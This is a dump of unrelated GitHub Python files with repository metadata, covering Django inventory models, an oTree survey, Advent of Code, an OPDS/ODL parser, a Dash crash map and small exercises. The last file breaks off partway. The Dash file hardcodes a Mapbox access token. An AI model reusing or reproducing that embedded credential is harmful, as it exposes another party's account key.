+{"seq_id":"32070725199","text":"import os\n\nfrom django.db import models\nfrom django.core.exceptions import ValidationError\nfrom django.contrib.auth.models import Group, User\nfrom django.contrib.contenttypes.models import ContentType\nfrom django.contrib.contenttypes.fields import GenericForeignKey, GenericRelation\nfrom django.utils import timezone\nfrom django.utils.text import slugify\n\nfrom membership_file.models import Member\n\n\n__all__ = [\"valid_item_class_ids\", \"Ownership\", \"Item\", \"MiscellaneousItem\"]\n\n\nclass ItemManager(models.Manager):\n \"\"\"Manager for any object related to Item. Replaces standard manager in .objects\"\"\"\n\n def get_all_in_possession(self):\n \"\"\"Returns all items currently in possession (owned or borrowed)\"\"\"\n content_type = ContentType.objects.get_for_model(self.model)\n ownerships = Ownership.objects.filter(content_type=content_type, is_active=True)\n return self.get_queryset().filter(ownerships__in=ownerships).distinct()\n\n def get_all_owned(self):\n \"\"\"Returns all items owned by the association\"\"\"\n content_type = ContentType.objects.get_for_model(self.model)\n ownerships = Ownership.objects.filter(content_type=content_type, is_active=True, group__isnull=False)\n return self.get_queryset().filter(ownerships__in=ownerships).distinct()\n\n def get_all_owned_by(self, member=None, group=None):\n \"\"\"Returns all items that are owned by the defined party\"\"\"\n assert member or group\n\n content_type = ContentType.objects.get_for_model(self.model)\n ownerships = Ownership.objects.filter(content_type=content_type, is_active=True)\n if member:\n ownerships = ownerships.filter(member=member)\n if group:\n ownerships = ownerships.filter(group=group)\n return self.get_queryset().filter(ownerships__in=ownerships).distinct()\n\n\n# File path to upload achievement images to\ndef get_item_image_upload_path(instance, filename):\n # Obtain extension\n # NB: A file can be renamed to have ANY extension\n _, extension = os.path.splitext(filename)\n\n item_name = f\"{instance.id}-{slugify(instance.name)}\"\n\n # file will be uploaded to MEDIA_ROOT / images/item//.\n return \"images/item/{type_str}/{item_name}{extension}\".format(\n type_str=slugify(instance.__class__.__name__),\n item_name=item_name,\n extension=extension,\n )\n\n\nclass Item(models.Model):\n \"\"\"Item in the inventory system. Abstract root class.\n\n On permissions:\n There are several unique default permissions used for Items\n add_group_ownership_for_: Allows users to add new ownerships to groups they are part of\n add_member_ownership_for_: Allows users to add new ownerships to any active member\n maintain_ownerships_for_: Adds additional control rights\n\n Furthermore the default permissions edit_ and delete_ are also used in the front-end\n\n This grants access to assigning items to groups or members respectively\n\n \"\"\"\n\n name = models.CharField(max_length=128)\n description = models.TextField(max_length=512, blank=True, null=True)\n image = models.ImageField(upload_to=get_item_image_upload_path, blank=True, null=True)\n\n icon_class = None # CSS classes for the icon\n\n ownerships = GenericRelation(\"inventory.Ownership\")\n # An achievement can also apply to roleplay items\n achievements = GenericRelation(\"achievements.AchievementItemLink\")\n\n objects = ItemManager()\n\n class Meta:\n abstract = True\n ordering = (\"name\",)\n\n # Set the default permissions. Each item has a couple of addiotional default permissions\n default_permissions = (\n \"add\",\n \"change\",\n \"delete\",\n \"view\",\n \"add_group_ownership_for\",\n \"add_member_ownership_for\",\n \"maintain_ownerships_for\",\n )\n\n @classmethod\n def get_item_contenttypes(cls):\n \"\"\"Returns all contenttypes for all items\"\"\"\n content_types = []\n for item_class in cls.__subclasses__():\n content_types.append(ContentType.objects.get_for_model(item_class))\n return content_types\n\n def currently_in_possession(self):\n \"\"\"Returns all ownership items that are currently at the Knights\"\"\"\n return self.ownerships.filter(is_active=True)\n\n def is_owned_by_association(self):\n \"\"\"Returns boolean stating whether this item is owned by the association\"\"\"\n return self.ownerships.filter(is_active=True).filter(group__isnull=False).exists()\n\n def is_loaned_by_member(self):\n \"\"\"Returns boolean stating whether this item is owned by the association\"\"\"\n\n return self.ownerships.filter(is_active=True).filter(member__isnull=False).exists()\n\n def __str__(self):\n return f\"{self.__class__.__name__}: {self.name}\"\n\n def other_fields(self):\n \"\"\"Returns a list of dicts with the model fields that are not defined in Item\"\"\"\n other_fields = []\n exclude_names = (\"id\", \"name\", \"description\", \"image\")\n for field in self._meta.local_fields:\n if field.name not in exclude_names:\n field_dict = {\n \"name\": field.name,\n \"verbose_name\": field.verbose_name,\n \"value\": getattr(self, field.name),\n }\n # Set a value in case there are choices\n if hasattr(self, f\"get_{field.name}_display\"):\n field_dict[\"display_value\"] = getattr(self, f\"get_{field.name}_display\")()\n\n other_fields.append(field_dict)\n return other_fields\n\n\ndef valid_item_class_ids():\n \"\"\"Returns a query parameter for ids of valid Item classes. Used for Ownership Content type validity\"\"\"\n valid_ids = []\n for content_type in Item.get_item_contenttypes():\n valid_ids.append(content_type.id)\n return {\"id__in\": valid_ids}\n\n\nclass Ownership(models.Model):\n member = models.ForeignKey(Member, on_delete=models.CASCADE, null=True, blank=True)\n group = models.ForeignKey(Group, on_delete=models.PROTECT, null=True, blank=True)\n\n added_since = models.DateField(default=timezone.now)\n added_by = models.ForeignKey(User, on_delete=models.SET_NULL, null=True)\n is_active = models.BooleanField(default=True, help_text=\"Whether item is currently at the Knights\")\n note = models.TextField(max_length=256, blank=True, null=True)\n value = models.DecimalField(\n max_digits=5, decimal_places=2, null=True, blank=True, verbose_name=\"initial purchase value\"\n )\n\n # The owned item\n content_type = models.ForeignKey(ContentType, on_delete=models.CASCADE, limit_choices_to=valid_item_class_ids)\n object_id = models.PositiveIntegerField()\n content_object = GenericForeignKey(\"content_type\", \"object_id\")\n\n @property\n def owner(self):\n \"\"\"Returns the owner of the item\"\"\"\n if self.member:\n return self.member\n else:\n return self.group\n\n def clean_fields(self, exclude=None):\n super().clean_fields(exclude=exclude)\n # Make exlude a list to prevent complex if statements\n exclude = exclude or []\n\n if \"content_type\" not in exclude and \"object_id\" not in exclude:\n if self.content_object is None:\n raise ValidationError(\"The connected item does not exist\", code=\"item_nonexistent\")\n\n def clean(self):\n super(Ownership, self).clean()\n # Validate that EITHER member or group must be defined\n if self.member is None and self.group is None:\n raise ValidationError(\"Either a member or a group has to be defined\", code=\"required\")\n if self.member and self.group:\n raise ValidationError(\"An item can't belong both to a user and a group\", code=\"invalid\")\n\n def __str__(self):\n if self.member:\n return f\"{self.content_object} supplied by {self.member}\"\n else:\n return f\"{self.content_object} owned ({self.group})\"\n\n\nclass MiscellaneousItem(Item):\n icon_class = \"fas fa-box\"\n","repo_name":"esrg-knights/Squire","sub_path":"inventory/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":8121,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"72"} +{"seq_id":"41169682475","text":"#!/opt/conda/bin/python\n# -*- coding: utf-8 -*-\n\nimport argparse\nfrom answer_pipeline.answer_main_pipeline import answer_main_pipeline\n\ndef parse_args():\n \"\"\"\n Parse input positional arguments from command line\n :return: args - parsed arguments\n \"\"\"\n parser = argparse.ArgumentParser('answer')\n parser.add_argument('article_fpath', help='Path to your article.', type=str)\n parser.add_argument('questions_fpath', help='Path to your questions..', type=str)\n args = parser.parse_args()\n return args\n\nif __name__=='__main__':\n # ./answer article.txt questions.txt\n args = parse_args()\n article_fpath = args.article_fpath\n questions_fpath = args.questions_fpath\n with open(article_fpath,\"r\") as f:\n doc=f.read()\n with open(questions_fpath,\"r\") as f:\n questions=f.readlines()\n answers = answer_main_pipeline(doc,questions)\n for i in answers:\n print(i[0][0])\n pass","repo_name":"yuxin-yao/QASystem","sub_path":"confucius_v2/answer.py","file_name":"answer.py","file_ext":"py","file_size_in_byte":932,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"7630751719","text":"from otree.api import (\n models, widgets, BaseConstants, BaseSubsession, BaseGroup, BasePlayer,\n Currency as c, currency_range\n)\nimport csv\n\nauthor = '© Kariyushi Rao, 2018'\n\ndoc = \"\"\"\nParticipants respond to basic demographics questions, self-report their relative knowledge of the stock\nmarket and their gambling frequency, describe the strategy they used in the experiment, report whether\nthey find the stimuli suspicious, and provide open response comments about their experience. \n\"\"\"\n\n\nclass Constants(BaseConstants):\n name_in_url = 'last_page'\n players_per_group = None\n num_rounds = 1\n\n\nclass Subsession(BaseSubsession):\n pass\n\n\nclass Group(BaseGroup):\n pass\n\n\nclass Player(BasePlayer):\n age = models.PositiveIntegerField()\n gender = models.IntegerField(\n choices=[[0, 'Male'],[1, 'Female'], [2, 'Other']],\n widget=widgets.RadioSelect\n )\n highest_degree = models.IntegerField(\n choices=[[1, 'No Degree'],[2, 'High School Diploma'], \n [3, '2-Year College Degree or Skilled Trade Program'], [4, '4-year College Degree'],\n # NOTE: Masters + value was miscoded as 4 in \"A\" versions of the experiments. \n # Error was fixed in \"B\" versions, but all Masters + responses were coded as \"4\"\n # in the analyses to allow for comparison between \"A\" and \"B\" experimental data.\n [5, 'Masters Degree or Higher']],\n widget=widgets.RadioSelect\n )\n stocks = models.IntegerField(\n choices=[[1, 'Better Than Average'],[0, 'About Average'], [-1, 'Worse Than Average']],\n widget=widgets.RadioSelect\n )\n gambling = models.IntegerField(\n choices=[[1, 'More Than Average'],[0, 'About Average'], [-1, 'Less Than Average']],\n widget=widgets.RadioSelect\n )\n strategy = models.TextField()\n suspicion = models.TextField()\n comments = models.TextField()\n","repo_name":"kariyushirao/predicting_outcomes","sub_path":"demographics/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1937,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"38045572968","text":"# https://adventofcode.com/2021/day/9\n\nfrom functools import reduce\n\ntest = \"2021-09_sample.txt\"\nrun = \"2021-09_input.txt\"\n\ndef part1(fname):\n sum = 0\n data = [[int(x) for x in list(line.rstrip())] for line in open(fname)]\n h = len(data)\n w = len(data[0])\n for i in range(h):\n for j in range(w):\n if i > 0 and data[i][j] >= data[i-1][j]:\n continue\n if i < h-1 and data[i][j] >= data[i+1][j]:\n continue\n if j > 0 and data[i][j] >= data[i][j-1]:\n continue\n if j < w-1 and data[i][j] >= data[i][j+1]:\n continue\n sum += data[i][j] + 1 \n #print(f'{i},{j} : {data[i][j]} {sum}')\n return sum\n\ndef part2(fname):\n basin_sizes = []\n connected = {}\n data = [[int(x) for x in list(line.rstrip())] for line in open(fname)]\n basin_map = [[0] * len(data[0]) for _ in range(len(data))]\n for i in range(len(data)):\n for j in range(len(data[0])):\n if data[i][j] == 9:\n basin_id = 0\n else:\n left = basin_map[i-1][j] if i > 0 else 0\n up = basin_map[i][j-1] if j > 0 else 0\n if left == 0 and up == 0:\n basin_id = len(basin_sizes) + 1\n basin_sizes.append(0)\n else:\n basin_id = max((left, up)) if left == 0 or up == 0 else min((left, up))\n while basin_id in connected:\n basin_id = connected[basin_id]\n if left != 0 and left != basin_id:\n connected[left] = basin_id\n if up != 0 and up != basin_id:\n connected[up] = basin_id\n basin_sizes[basin_id - 1] += 1\n basin_map[i][j] = basin_id\n #print(f'basin sizes: {basin_sizes}')\n for i in range(len(basin_sizes)-1, -1, -1):\n if i+1 in connected:\n basin_id = connected[i+1]\n basin_sizes[basin_id - 1] += basin_sizes[i]\n basin_sizes[i] = 0\n #print(f'basin sizes: {basin_sizes}')\n #print(connected)\n #for line in basin_map:\n # print(''.join([f'{n:3d}' if n not in connected else f'{connected[n]:3d}' for n in line]))\n return reduce(lambda a, b: a*b, sorted(basin_sizes)[-3:])\n\nassert part1(test) == 15\nprint(f'part1: {part1(run)}')\n\nassert part2(test) == 1134\nprint(f'part2: {part2(run)}')\n","repo_name":"esc2345/advent_of_code","sub_path":"2021/2021-09.py","file_name":"2021-09.py","file_ext":"py","file_size_in_byte":2450,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"36094341296","text":"import datetime\n\nfrom webpub_manifest_parser.core.ast import (\n ArrayOfCollectionsProperty,\n ArrayOfLinksProperty,\n Collection,\n CollectionList,\n Node,\n)\nfrom webpub_manifest_parser.core.properties import (\n ArrayOfStringsProperty,\n BooleanProperty,\n DateOrTimeProperty,\n NumberProperty,\n TypeProperty,\n URIProperty,\n)\nfrom webpub_manifest_parser.odl.registry import ODLCollectionRolesRegistry\nfrom webpub_manifest_parser.opds2.ast import OPDS2Feed, OPDS2Price, OPDS2Publication\nfrom webpub_manifest_parser.opds2.registry import OPDS2CollectionRolesRegistry\nfrom webpub_manifest_parser.utils import is_string\n\n\nclass ODLLicenseTerms(Node):\n \"\"\"ODL license terms & conditions.\"\"\"\n\n checkouts = NumberProperty(\"checkouts\", required=False)\n expires = DateOrTimeProperty(\"expires\", required=False)\n concurrency = NumberProperty(\"concurrency\", required=False)\n length = NumberProperty(\"length\", required=False)\n\n\nclass ODLLicenseProtection(Node):\n \"\"\"ODL license protection information.\"\"\"\n\n formats = ArrayOfStringsProperty(\"format\", required=False)\n devices = NumberProperty(\"devices\", required=False)\n copy_allowed = BooleanProperty(\"copy\", required=False)\n print_allowed = BooleanProperty(\"print\", required=False)\n tts_allowed = BooleanProperty(\"tts\", required=False)\n\n\nclass ODLLicenseMetadata(Node):\n \"\"\"ODL license metadata.\"\"\"\n\n identifier = URIProperty(\"identifier\", required=True)\n formats = ArrayOfStringsProperty(\"format\", required=True)\n created = DateOrTimeProperty(\"created\", required=True)\n terms = TypeProperty(\n \"terms\",\n required=False,\n nested_type=ODLLicenseTerms,\n )\n protection = TypeProperty(\n \"protection\",\n required=False,\n nested_type=ODLLicenseProtection,\n )\n price = TypeProperty(\n \"price\",\n required=False,\n nested_type=OPDS2Price,\n )\n source = URIProperty(\"source\", required=False)\n\n def __init__(self, identifier=None, formats=None, created=None):\n \"\"\"Initialize a new instance of ODLLicenseMetadata class.\n\n :param identifier: License's identifier\n :type identifier: str\n\n :param formats: List of license formats\n :type formats: List[str]\n\n :param created: Time when the license was created\n :type created: datetime.datetime\n \"\"\"\n super().__init__()\n\n if identifier and not is_string(identifier):\n raise ValueError(\"Argument 'identifier' must be a string\")\n if formats and not isinstance(formats, list):\n raise ValueError(\"Argument 'formats' must be a list\")\n if created and not isinstance(created, datetime.datetime):\n raise ValueError(\n f\"Argument 'created' must be an instance of {datetime.datetime}\"\n )\n\n self.identifier = identifier\n self.formats = formats\n self.created = created\n\n\nclass ODLLicense(Collection):\n \"\"\"ODL license subcollection.\"\"\"\n\n metadata = TypeProperty(\"metadata\", required=True, nested_type=ODLLicenseMetadata)\n\n def __hash__(self):\n \"\"\"Calculate the hash.\n\n :return: Hash\n :rtype: int\n \"\"\"\n return hash((self.metadata, self.links))\n\n\nclass ODLPublication(OPDS2Publication):\n \"\"\"ODL publication.\"\"\"\n\n links = ArrayOfLinksProperty(key=\"links\", required=False)\n licenses = ArrayOfCollectionsProperty(\n \"licenses\",\n required=False,\n role=ODLCollectionRolesRegistry.LICENSES,\n collection_type=ODLLicense,\n )\n\n def __init__(self, metadata=None, links=None, images=None, licenses=None):\n \"\"\"Initialize a new instance of ODLPublication class.\n\n :param metadata: Publication's metadata\n :type metadata: webpub_manifest_parser.core.ast.Metadata\n\n :param links: List of publication's links\n :type links: LinkList\n\n :param images: List of publication's images\n :type images: LinkList\n\n :param licenses: List of publication's licenses\n :type licenses: LinkList\n \"\"\"\n super().__init__(metadata, links, images)\n\n if licenses and not isinstance(licenses, CollectionList):\n raise ValueError(\n f\"Argument 'licenses' must be an instance of {CollectionList}\"\n )\n\n self.licenses = licenses\n\n def __hash__(self):\n \"\"\"Calculate the hash.\n\n :return: Hash\n :rtype: int\n \"\"\"\n return hash((super().__hash__(), self.licenses))\n\n\nclass ODLFeed(OPDS2Feed):\n \"\"\"ODL 2.x feed.\"\"\"\n\n publications = ArrayOfCollectionsProperty(\n \"publications\",\n required=False,\n role=OPDS2CollectionRolesRegistry.PUBLICATIONS,\n collection_type=ODLPublication,\n )\n","repo_name":"ThePalaceProject/webpub-manifest-parser","sub_path":"src/webpub_manifest_parser/odl/ast.py","file_name":"ast.py","file_ext":"py","file_size_in_byte":4786,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"2380105839","text":"import dash\nimport dash_core_components as dcc\nimport dash_html_components as html\nimport pandas as pd\nimport plotly.graph_objs as go\n\n\ndf = pd.read_csv('../Car_Crash/Data/Crash.csv', skipinitialspace=True)\ndf = df[~df['Postal'].isnull()]\n# convert zip code into strings\ndf.Postal = df.Postal.astype(int).astype(str)\ndf.Postal = df.Postal.apply(lambda x: x if len(x) == 5 else '0'+x)\n\nmapbox_access_token = 'pk.eyJ1IjoidWlyc2VpdGEiLCJhIjoiY2pwaGx4eXQ0MDAwdTNxcX' \\\n 'dwMGo0cGpxdiJ9.ux2pBATNhOgnghsvMFbQvw'\ncolumn_list = ['Crash_Record_Number',\n 'County_Name',\n 'Crash_Year',\n 'Weather',\n 'Road_Condition',\n 'Collision_Type',\n 'Latitude_(Decimal)',\n 'Longitude_(Decimal)',\n 'Postal']\ndf1 = df[column_list]\ndf1['Collision_Type'] = df1['Collision_Type'].astype('category')\ndf1['Collision_Type_color'] = df1['Collision_Type'].cat.codes\ndf1['Collision_Type_color'] = df1['Collision_Type_color'] / (\n len(df1['Collision_Type_color'].unique().tolist()) - 1)\n\nexternal_stylesheets = ['https://codepen.io/chriddyp/pen/bWLwgP.css']\n\napp = dash.Dash(__name__, external_stylesheets=external_stylesheets)\n\ncrash_type_list = df1.Collision_Type.unique().tolist()\nyear_list = df1.Crash_Year.sort_values().unique().tolist()\n\napp.layout = html.Div([\n html.Div([\n html.Div([\n dcc.Dropdown(\n id='crash_type',\n options=[{'label': i, 'value': i} for i in crash_type_list],\n value=crash_type_list,\n multi=True\n ),\n dcc.Dropdown(\n id='year',\n options=[{'label': i, 'value': i} for i in year_list],\n value=year_list,\n multi=True\n )\n ], style={'width': '20%', 'display': 'inline-block'})\n ]),\n\n dcc.Graph(id='indicator-graphic')\n])\n\n\n@app.callback(\n dash.dependencies.Output('indicator-graphic', 'figure'),\n [dash.dependencies.Input('crash_type', 'value'),\n dash.dependencies.Input('year', 'value')])\ndef update_graph(crash_type, year):\n scl = [[0, \"rgb(229, 0, 14)\"], [1 / 9, \"rgb(231, 63, 2)\"],\n [2 / 9, \"rgb(233, 142, 5)\"], [3 / 9, \"rgb(235, 220, 8)\"],\n [4 / 9, \"rgb(177, 237, 11)\"], [5 / 9, \"rgb(104, 239, 14)\"],\n [6 / 9, \"rgb(0, 0, 0)\"], [7 / 9, \"rgb(32, 241, 17)\"],\n [8 / 9, \"rgb(23, 245, 156)\"], [1, \"rgb(27, 248, 232)\"]]\n plot_df = df1\n plot_df = plot_df[plot_df['Collision_Type'].isin(crash_type)]\n plot_df = plot_df[plot_df['Crash_Year'].isin(year)]\n\n # the maximum number of points on the mapbox object is 40K\n if plot_df.shape[0] > 40000:\n plot_df = plot_df.sample(n=40000, replace=False, random_state=1)\n\n data = [\n go.Scattermapbox(\n lon=plot_df['Longitude_(Decimal)'],\n lat=plot_df['Latitude_(Decimal)'],\n text=plot_df['Collision_Type'],\n mode='markers',\n marker=dict(\n size=5,\n opacity=0.7,\n autocolorscale=False,\n colorscale=scl,\n color=plot_df['Collision_Type_color'],\n ),\n )\n ]\n\n layout = go.Layout(\n autosize=True,\n hovermode='closest',\n mapbox=dict(\n accesstoken=mapbox_access_token,\n bearing=0,\n center=dict(\n lat=41,\n lon=-77\n ),\n pitch=0,\n zoom=6\n ),\n )\n\n return go.Figure(data=data, layout=layout)\n\n\nif __name__ == '__main__':\n app.run_server(debug=True)\n","repo_name":"Uirseita/DATA1030_Project_2","sub_path":"interactive_visualization/crash_type_by_location_and_year_on_map.py","file_name":"crash_type_by_location_and_year_on_map.py","file_ext":"py","file_size_in_byte":3657,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"23186766346","text":"#!/usr/bin/env python\n\n__author__ = 'Gideon Bar'\n\nimport os\nimport argparse\nimport yaml\nfrom collections import namedtuple\nimport logging\n\nfrom wielder.util.arguer import LogLevel, convert_log_level\nfrom wielder.util.log_util import setup_logging\n\n\nclass Conf:\n\n def __init__(self):\n\n self.template_ignore_dirs = []\n\n def attr_list(self, should_print=False):\n\n items = self.__dict__.items()\n if should_print:\n\n logging.debug(\"Conf items:\\n______\\n\")\n [logging.debug(f\"attribute: {k} value: {v}\") for k, v in items]\n\n return items\n\n\ndef get_datalake_parser():\n\n parser = argparse.ArgumentParser(description=\n 'Data Orchestration Reactive Framework.')\n\n parser.add_argument(\n '-cf', '--conf_file',\n type=str,\n help='Full path to config file with all arguments.\\nCommandline args override those in the file.'\n )\n\n parser.add_argument(\n '-pl', '--plan',\n type=bool,\n default=False,\n help='plan means to create template instances/files but not deploy them e.g. conf.yml.tmpl => conf.yml.'\n )\n\n parser.add_argument(\n '-e', '--env',\n type=str,\n default='qe',\n help='Deployment environment local means dev refers to git branches ...'\n )\n\n parser.add_argument(\n '-re', '--runtime_env',\n type=str,\n default='local-docker',\n help='Runtime environment eg local-docker, local, gcp, gcp-shared-vpc etc...'\n )\n\n parser.add_argument(\n '-cpr', '--cloud_provider',\n type=str,\n choices=['gcp', 'aws', 'azure'],\n help='Cloud provider will only mean something if not local:'\n )\n\n parser.add_argument(\n '-edb', '--enable_debug',\n type=bool,\n help='Enabling Debug ports for remote debugging:'\n )\n\n parser.add_argument(\n '-ll', '--log_level',\n type=LogLevel,\n choices=list(LogLevel),\n help='LogLevel: as in Python logging',\n default=LogLevel.INFO\n )\n\n return parser\n\n\ndef extract_gcp_to_conf(conf):\n\n raw = conf.raw_config_args['gcp']\n\n gcp = Conf()\n\n gcp.gcp_project = raw['project']\n gcp.gcp_image_repo_zone = raw['image_repo_zone']\n gcp.is_shared_vpc = raw['is_shared_vpc']\n gcp.region = raw['region']\n gcp.zone = raw['zone']\n gcp.image_repo_zone = raw['image_repo_zone']\n gcp.service_accounts = raw['service_accounts']\n gcp.network = raw['network']\n gcp.subnetwork = raw['subnetwork']\n\n conf.gcp = gcp\n\n gcp_services = raw['services']\n\n if 'dataproc' in gcp_services:\n\n raw_dataproc = gcp_services['dataproc']\n dataproc = Conf()\n dataproc.high_availability = raw_dataproc['high_availability']\n dataproc.extra_tags = raw_dataproc['extra_tags']\n dataproc.region = raw_dataproc['region']\n dataproc.zone = raw_dataproc['zone']\n dataproc.internal_ip_only = raw_dataproc['internal_ip_only']\n dataproc.master_machine_type = raw_dataproc['master_machine_type']\n dataproc.worker_machine_type = raw_dataproc['worker_machine_type']\n dataproc.master_boot_disk_size = raw_dataproc['master_boot_disk_size']\n dataproc.worker_boot_disk_size = raw_dataproc['worker_boot_disk_size']\n dataproc.num_worker_nodes = raw_dataproc['num_worker_nodes']\n\n conf.gcp.dataproc = dataproc\n \n\ndef process_args(cmd_args):\n\n if cmd_args.conf_file is None:\n\n dir_path = os.path.dirname(os.path.realpath(__file__))\n\n cmd_args.conf_file = dir_path + '/data_conf.yaml'\n\n log_level = convert_log_level(cmd_args.log_level)\n\n logging.basicConfig(\n format='%(asctime)s %(levelname)s :%(message)s',\n level=log_level,\n datefmt='%m/%d/%Y %I:%M:%S %p'\n )\n\n with open(cmd_args.conf_file, 'r') as yaml_file:\n conf_args = yaml.load(yaml_file, Loader=yaml.FullLoader)\n\n if not hasattr(conf_args, 'plan'):\n conf_args['plan'] = False\n\n logging.debug('Configuration File Arguments:')\n\n config_items = cmd_args.__dict__.items()\n\n for k, v in config_items:\n\n if v is not None:\n conf_args[k] = v\n\n named_tuple = namedtuple(\"Conf1\", conf_args.keys())(*conf_args.values())\n\n conf = Conf()\n\n conf.plan = named_tuple.plan\n conf.conf_file = named_tuple.conf_file\n conf.deploy_env = named_tuple.deploy_env\n conf.enable_debug = named_tuple.enable_debug\n conf.enable_dev = named_tuple.enable_dev\n conf.deploy_strategy = named_tuple.deploy_strategy\n conf.supported_deploy_envs = named_tuple.supported_deploy_envs\n conf.cloud_provider = named_tuple.cloud_provider\n conf.template_ignore_dirs = named_tuple.template_ignore_dirs\n conf.template_variables = named_tuple.template_variables\n conf.script_variables = named_tuple.script_variables\n\n conf.git_super_repo = named_tuple.git_super_repo\n conf.git_branch = named_tuple.git_branch\n conf.git_commit = named_tuple.git_commit\n\n conf.raw_config_args = conf_args\n\n if conf.cloud_provider == 'gcp':\n\n extract_gcp_to_conf(conf)\n\n conf.attr_list(True)\n\n return conf\n\n\nif __name__ == \"__main__\":\n\n setup_logging(log_level=logging.DEBUG)\n\n datalake_args, other_args = get_datalake_parser().parse_known_args()\n\n _conf = process_args(datalake_args)\n\n logging.debug('break point')\n\n logging.info(f\"datalake_args:\\n{datalake_args}\\n\")\n logging.info(f\"other_args:\\n{other_args}\")\n\n\n\n\n\n","repo_name":"hamshif/Wielder","sub_path":"wielder/util/data_conf.py","file_name":"data_conf.py","file_ext":"py","file_size_in_byte":5485,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"23890575164","text":"import sys\nfrom collections import defaultdict\n\ninput= sys.stdin.readline\n\ndef sol(x : int) -> int:\n nnn = x //100\n nn = (x-100*nnn)//10\n n = x % 10\n if nn == (n+nnn)/2:\n return x\n \n\n\nn = int(input())\ntemp = 0\n\nlist = [x for x in range(1,100)]\n\nif n < 100:\n print(n)\nelse:\n for i in range(100,n+1):\n temp = sol(i)\n if type(temp) == int:\n list.append(temp)\n print(len(list))\n\n\n\n\n \n","repo_name":"leechi2/LCL_WORLD","sub_path":"baekjoon/단계별/함수/1065.py","file_name":"1065.py","file_ext":"py","file_size_in_byte":439,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"36781305430","text":"import sys\nfrom rec import *\nfrom rec_db import timestamp_interval_within_activity\n\n\ndef main():\n\n # parameters\n args = sys.argv\n u_iloc = int(args[1])\n\n # INIT\n md = MetaData()\n db = md.db_base_loader(['units', 'events', 'activity'])\n units, events, activity = db['units'], db['events'], db['activity']\n\n sm = SamplingMethod()\n\n unit_ind = units.iloc[u_iloc].name\n sess, _, _ = unit_ind\n events_slice = events.loc[events['Session'].eq(sess)]\n activity_collection = activity.loc[unit_ind]\n\n def event_within_activity(event_row):\n if np.isnan(event_row['StageDuration']):\n return False\n event_onset_point = SamplingPoint(sm, stamp=event_row['StageTimeIndex'])\n event_window = SamplingInterval(SamplingPoint(sm, t=0 * qu.ms),\n SamplingPoint(sm, t=event_row['StageDuration'] * qu.ms))\n event_fr_interval = SamplingInterval(event_onset_point, event_onset_point.copy()).get_offset(event_window)\n return timestamp_interval_within_activity(event_fr_interval.start.stamp, event_fr_interval.end.stamp,\n activity_collection)\n\n # for every event\n unit_mask = events_slice.apply(event_within_activity, axis=1)\n unit_events_list = unit_mask.loc[unit_mask].index\n\n # SAVE\n md.np_saver(unit_events_list,\n md.preproc_dest_path(path.join('temp', 'units_events',\n 'units_events_{0:s}_chan{1:03d}_unit{2:03d}.pkl'.format(*unit_ind))))\n\n\nmain()\n","repo_name":"pkollias/GatingInWorkingMemory","sub_path":"import_units_events_parse_unit.py","file_name":"import_units_events_parse_unit.py","file_ext":"py","file_size_in_byte":1574,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"8035104539","text":"# This Source Code Form is subject to the terms of the Mozilla Public\n# License, v. 2.0. If a copy of the MPL was not distributed with this file,\n# You can obtain one at http://mozilla.org/MPL/2.0/.\n\nfrom apscheduler.schedulers.blocking import BlockingScheduler\nfrom crashclouseau import update\n\n\nsched = BlockingScheduler(timezone=\"GMT\")\n\n\n@sched.scheduled_job(\"interval\", minutes=20)\ndef timed_job():\n update.update_all()\n\n\nsched.start()\n","repo_name":"bxbrenden/crash-clouseau","sub_path":"bin/schedule.py","file_name":"schedule.py","file_ext":"py","file_size_in_byte":443,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"72"} +{"seq_id":"16669017397","text":"with open(\"/uploads/sample_input3.txt\") as file:\n file.seek(0)\n text = file.readlines()\n\ngoodies=[]\nprice=[]\nn=int(input('Number of employees: '))\nfor i in text:\n temp=str(i).split(\":\")\n goodies.append(temp[0])\n price.append(int(str(temp[1]).strip().split('\\n')[0]))\n\nprint(goodies)\n\n\nfor i in range(len(price)):\n for j in range(i+1,len(price)):\n if price[j] 0:\n \n if guess_word == key:\n print(\"Your answer is right!!\")\n print(\"You won!!\")\n print(\"\")\n time.sleep(2)\n loop_play()\n \n if guess_word != key:\n turns = turns - 1\n \n if turns == 2:\n print(\"Your answer is wrong\")\n print(\"2 more guesses to enter right answer!!\")\n print(\"\")\n guess_word = input(\"Enter your answer: \")\n\n if turns == 1:\n print(\"Your answer is wrong\")\n print(\"1 more guess to enter right answer!!\")\n print(\"\")\n guess_word = input(\"Enter your answer: \")\n\n if turns == 0:\n print(\"No more turns!! \\n You lost the game!!\") \n print(f\"The correct answer is {key}\")\n print(\"\")\n time.sleep(1)\n loop_play()\n\ndef loop_play():\n answer = input(\"Do you want to play again? \\n Type Yes to continue and No to exit: \")\n if answer == \"Yes\":\n print(\"\")\n wmk()\n elif answer == \"No\":\n print(\"We hope to see you again soon!! \\n Thanks for playing!!\")\n time.sleep(2)\n quit()\n else:\n print(\"\")\n print(\"Enter the valid response (Yes or No).\")\n loop_play()\n\nname = input(\"Enter your name: \")\nprint(\"Welcome to the game!!!\")\nprint(\"You have 3 chances to guess the right word according to the definition\")\nprint(\"\")\nwmk()","repo_name":"avreetkaur84/Guessword_game","sub_path":"Random.py","file_name":"Random.py","file_ext":"py","file_size_in_byte":3002,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"38548761859","text":"import socket, os, time, sys\nfrom Crypto.Cipher import AES\n\ntext_to_send = \"\"\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Aliquam et feugiat odio. Nullam vitae ante at erat porta rutrum et at mi. Vestibulum nisl orci, lobortis nec arcu 